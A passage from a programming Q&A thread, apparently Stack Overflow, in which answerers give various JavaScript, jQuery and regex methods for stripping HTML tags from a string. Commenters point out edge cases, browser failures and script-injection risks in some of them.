str=str.replace(/(<\?[a-z]*(\s[^>]*)?\?(>|$)|<!\[[a-z]*\[|\]\]>|<!DOCTYPE[^>]*?(>|$)|<!--[\s\S]*?(-->|$)|<[a-z?!\/]([a-z0-9_:.])*(\s[^>]*)?(>|$))/gi, '');
```

Answer (score 1):

simple 2 line jquery to strip the html.

```
 var content = "<p>checking the html source&nbsp;</p><p>&nbsp;
  </p><p>with&nbsp;</p><p>all</p><p>the html&nbsp;</p><p>content</p>";

 var text = $(content).text();//It gets you the plain text
 console.log(text);//check the data in your console

 cj("#text_area_id").val(text);//set your content to text area using text_area_id
```

Answer (score 1):

Using Jquery:

```
function stripTags() {
    return $('<p></p>').html(textToEscape).text()
}
```

Answer (score 1):

`input` element [support only one line text](https://www.w3.org/wiki/HTML/Elements/input/text):

> The text state represents a one line plain text edit control for the element's value.

```
function stripHtml(str) {
  var tmp = document.createElement('input');
  tmp.value = str;
  return tmp.value;
}
```

**Update:** this works as expected

```
function stripHtml(str) {
  // Remove some tags
  str = str.replace(/<[^>]+>/gim, '');

  // Remove BB code
  str = str.replace(/\[(\w+)[^\]]*](.*?)\[\/\1]/g, '$2 ');

  // Remove html and line breaks
  const div = document.createElement('div');
  div.innerHTML = str;

  const input = document.createElement('input');
  input.value = div.textContent || div.innerText || '';

  return input.value;
}
```

Comment: Doesn't work, please always mention the browser you are using when posting an answer. This is inaccurate and won't work in Chrome 61. Tags are just rendered as a string.

Answer (score 1):

```
const getTextFromHtml = (t) =>
  t
    ?.split('>')
    ?.map((i) => i.split('<')[0])
    .filter((i) => !i.includes('=') && i.trim())
    .join('');

const test = '<p>This <strong>one</strong> <em>time</em>,</p><br /><blockquote>I went to</blockquote><ul><li>band <a href="https://workingclasshistory.com" rel="noopener noreferrer" target="_blank">camp</a>…</li></ul><p>I edited this as a reviewer just to double check</p>'

getTextFromHtml(test)
  // 'This onetime,I went toband camp…I edited this as a reviewer just to double check'
```

Comment: Thanks it works but not strips, &nbsp;

Answer (score 1):

As others suggested, I recommend using `DOMParser` when possible.

However, if you happen to be working inside a **Node**/**JS** Lambda or otherwise `DOMParser` is not available, I came up with the regex below to match most of the scenarios mentioned in previous answers/comments. It doesn't match `$gt;` and `$lt;` as some others may have a concern about, but should capture pretty much any other scenario.

```
const dangerousText = '?';
const htmlTagRegex = /<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi;
const sanitizedText = dangerousText.replace(htmlTagRegex, '');
```

This might be easy to simplify, but it should work for most situations. Hope it helps someone.

Comment: `'<div data="a > b < c">Test</div>'.replace(/<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi, '')`

Comment: `'<img alt="a>b" src="a_b.gif" />Test'.replace(/<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi, '')`

Answer (score 0):

```
    (function($){
        $.html2text = function(html) {
            if($('#scratch_pad').length === 0) {
                $('<div id="lh_scratch"></div>').appendTo('body');  
            }
            return $('#scratch_pad').html(html).text();
        };

    })(jQuery);
```

Define this as a jquery plugin and use it like as follows:

```
$.html2text(htmlContent);
```

Comment: Lets say this comes from user input. It can be used to add script or macros to your page

Answer (score 0):

For escape characters also this will work using pattern matching:

```
myString.replace(/((&lt)|(<)(?:.|\n)*?(&gt)|(>))/gm, '');
```

Answer (score 0):

https://developer.mozilla.org/en-US/docs/Web/API/Element/insertAdjacentHTML

```
var div = document.getElementsByTagName('div');
for (var i=0; i<div.length; i++) {
    div[i].insertAdjacentHTML('afterend', div[i].innerHTML);
    document.body.removeChild(div[i]);
}
```

Answer (score 0):

method 1:

```
function cleanHTML(str){
  str.replace(/<(?<=<)(.*?)(?=>)>/g, '&lt;$1&gt;');
}

function uncleanHTML(str){
  str.replace(/&lt;(?<=&lt;)(.*?)(?=&gt;)&gt;/g, '<$1>');
}
```

method 2:

```
function cleanHTML(str){
  str.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function uncleanHTML(str){
  str.replace(/&lt;/g, '<').replace(/&gt;/g, '>');
}
```

also, don't forget if the user happens to post a math comment `(ex: 1 < 2)`, you don't want to strip the whole comment. The browser (only tested chrome) doesn't run unicode as html tags. if you replace all `<` with `&lt;` everyware in the string, the unicode will display `<` as text without running any html. I recommend method 2. jquery also works well `$('#element').text();`

Answer (score 0):

```
var STR='<Your HTML STRING>''
var HTMLParsedText="";
   var resultSet =  STR.split('>')
   var resultSetLength =resultSet.length
   var counter=0
   while(resultSetLength>0)
   {
      if(resultSet[counter].indexOf('<')>0)
      {    
        var value = resultSet[counter];
        value=value.substring(0, resultSet[counter].indexOf('<'))
        if (resultSet[counter].indexOf('&')>=0 && resultSet[counter].indexOf(';')>=0) {
            value=value.replace(value.substring(resultSet[counter].indexOf('&'), resultSet[counter].indexOf(';')+1),'')
        }
      }
        if (value)
        {
          value = value.trim();
          if(HTMLParsedText === "")
          {
              HTMLParsedText = value;
          }
          else
          {
            if (value) {
              HTMLParsedText = HTMLParsedText + "\n" + value;
            }
          }
          value='';
        }
        counter= counter+1;
      resultSetLength=resultSetLength-1;
   }
  console.log(HTMLParsedText);
```

Answer (score 0):

This package works really well for stripping HTML: https://www.npmjs.com/package/string-strip-html

It works in both the browser and on the server (e.g. Node.js).

Answer (score 0):

You can strip out all the html tags with the following regex: **/<(.|\n)*?>/g**

Example:

```
let str = "<font class=\"ClsName\">int[0]</font><font class=\"StrLit\">()</font>";
console.log(str.replace(/<(.|\n)*?>/g, ''));
```

Output:

```
int[0]()
```

Answer (score 0):

Additionally if you want to strip the html from a string and preserve the break lines, you can use this:

```
function stripHTML(string)(
  let doc = new DOMParser().parseFromString(string, 'text/html');
  let textLines = [];
  doc.body.childNodes.forEach((childNode) => {
    textLines.push(childNode.textContent || '');
  })
  let result = textLines.join('<br>');
  return result;
)
```

Answer (score -1):

```
function strip_html_tags(str)
{
   if ((str===null) || (str===''))
       return false;
  else
   str = str.toString();
  return str.replace(/<[^>]*>/g, '');
}
```

Comment: Rolling your own like this is at best a half-solution because this will just nuke the `<br>` newlines and remove other meaningful information.  It removes angle brackets and their interiors from a body of text which leaves you in an inconsistent state. Plus the non angle-bracketed HTML code wouldn't be affected.  This is a start I guess, but a function to do this would be at minimum several hundred lines.